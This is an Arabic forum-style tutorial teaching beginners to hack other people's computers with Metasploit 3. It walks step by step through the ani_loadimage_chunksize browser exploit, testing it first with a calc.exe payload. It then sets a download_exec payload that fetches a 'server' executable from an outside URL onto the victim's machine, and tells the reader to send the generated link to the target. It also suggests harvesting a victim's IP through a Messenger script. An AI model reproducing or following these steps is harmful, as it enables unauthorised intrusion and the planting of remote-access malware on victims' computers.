لسلام عليكم ورحمة الله وبركاته
بسم الله نبدأ
:: ---نبذه--- ::
كما تعرفون اصبحت ثغرات المتصفح قليله في وقتنا الحالي ...
وصعوبة البحث من قبل الهكر ذو المستوى البسيط عن اكتشاف ثغرات جديده بنفسه ...
فقاموا بعمل مشروع يساعد المبرمجين (الهكر) ع اكتشاف الثغرات بجميع انواعها ...
من خلال هذا البرنامج سوف تصبح محترف بأذن الله ..
::--وظيفة البرنامج --::
البرنامج يقوم بجمع جميع الثغرات المنزله من قبل مواقع السيكورتي والمواقع الاخرى بطريقه مبسطه وسهولة التعرف ع نوع الثغره واشياء اخرى سوف نتطرق لها ...
البرنامج مزورد ببرامج تساعد لاأختراق المواقع مثل برنامج النت كات وبرنامج ترجمة ثغرات الروبي وغيرها (يعني عده كامله )
::-- طريقة استعمال البرنامج --::
اول حاجه في مسطلحات الي راح نستخدمها :-
:.:.:..اوامر الاستخدام :.:.:. Command
show <==== أعرض
set <==== أختار
use <==== استخدم
unset <==== تراجع
cmd <==== تنفيذ امر
--------------------------------------------------------------------
:.:.:.. اوامر خيارات الثغره :.:.:..
payload <==== هذا الامر مهم .. هذا البايلود وظعوه بالبرنامج يعطيك خيارات بالثغره يسألك يقولك س\ كيف تريد ان تتصل بالثغره وماذا تريد ان تعمل بها ..؟؟ عاد هو يعطيك خيارات كثار راح نشوفها بعد شوي ..
Options <==== هذا امر يعرض لك خيارات الثغره بعد التعديل ومواصفات الثغره والانظمه التي تشتغل عليها الثغره مثل ( xp , liunx ) ويختلف تمام عن الامر السابق لحد يلخبط
--------------------------------------------------------------------
:.:.:.. طريقة الاستعمال وكيفية الاختراق..:.:.:.:
طيب بعد ما تحمل البرنامج سويله تحديث (update) عشان تحمل عليه آخر الثغرات اللي نزلت
وبعد ما تسوي التحديث إفتح البرنامج
بدأ ====>> كافة البرامج =====>> ****sploit ====>> ا****sploit 3 ***
وانتظر بعدها وإظغط على console
وتجينا الواجه الي نطبق عليها الشرح
الآن أكتب الآمر التالي
show exploits
وحتجينا جميع الثغرات
ثغرات المتصفح تبدأ بـ---->> windows/browser
طيب انا حشرح اخر ثغرة نزلت اللي هيا ثغرة ani_loadimage_chunksize
اكتب الآمر التالي لإستخدامها
use windows/browser/ani_loadimage_chunksize
الآن نستخدم بايلود وقلنا ان البايلود وظيفته يسألك بعد ماتختار الثغره يقولك ماذا تريد ان تعمل في الثغره ..( يعني تبي تتصل فيها اتصال مباشر bind ولا اتصال عكسي reverseالخ....)
البرنامج فيه بايلودات كثيره نختار اللي يناسبنا
هذا امر من اوامر البايلود بشرحلكم وضيفته windows/download_exec
هذا امر لنظام وندوز يقوم بتحميل واستخراج صيغة exe وهو الي راح نستخدمه بالاختراق
اكتب الآمر التالي لعرض جميع البايلودات
show payloads
طيب الآن نسوي تجربه
ونستخدم بايلود لكتابة الآوامر
ونكتب فيه الآمر calc.exe
وهو آمر لتشغيل الآلة الحاسبة
ونجربه على نفسنا ونشوف هل الآلة الحاسبة تشتغل ؟
اذا كانت تشتغل يعني الثغرة شغالة 100%
اكتب الآوامر التالية
set payload windows/exec
هذا الآمر لإستخدام بايلود كتابة الآوامر
set cmd calc.exe
وهذا الآمر لجعله يشغل الآلة الحاسبة
نكتب بعد كذا امر لتحديد اي بي الشخص المستهدف وانت لازم تجيبه بأي طريقه ... استخدم سكربت ipget للماسنجر وغيرها طرق مانبي نتطرق للامر .... طبعا انت بالامر هذا بدا الاكس الموجود تحط الاي بي حقك عشان تجرب ع نفسك .. الثغره وتشوف هي شغاله ولا لا
set payloads SRVHOST xxx.xxx.xxx.xxx
واكتب exploit لبدأ الثغرة
مثل مانتو ملاحظين البرنامج اعطانا رابط
انسخ الرابط والصقه في المتصفح
وحتشتغل الآلة الحاسبة في جهازك
طيب هذا يعني الثغرة شغالة 100%
طيب الآن نغير البايلود ونستخدم بايلود لتنزيل الباتش
اكتب الآوامر التآلية
unset payload
وهو الآمر للتراجع عن استخدام البايلود
set payload windows/download_exec
آمر لإستخدام بايلود لتنزيل الباتش في جهاز الضحية
set url
http://feezo.com/server.exeمع استبدال رابط سيرفرك
واكتب exploit لبدأ الثغرة
مثل ما إنتو شايفين في الصورة البرنامج اعطانا رابط
الرابط هذا اعطيه للي تبي تخترق جهازه
وانتهينا...اتمنا فهمتو الشششرح.......][تح ـيـآتي][~|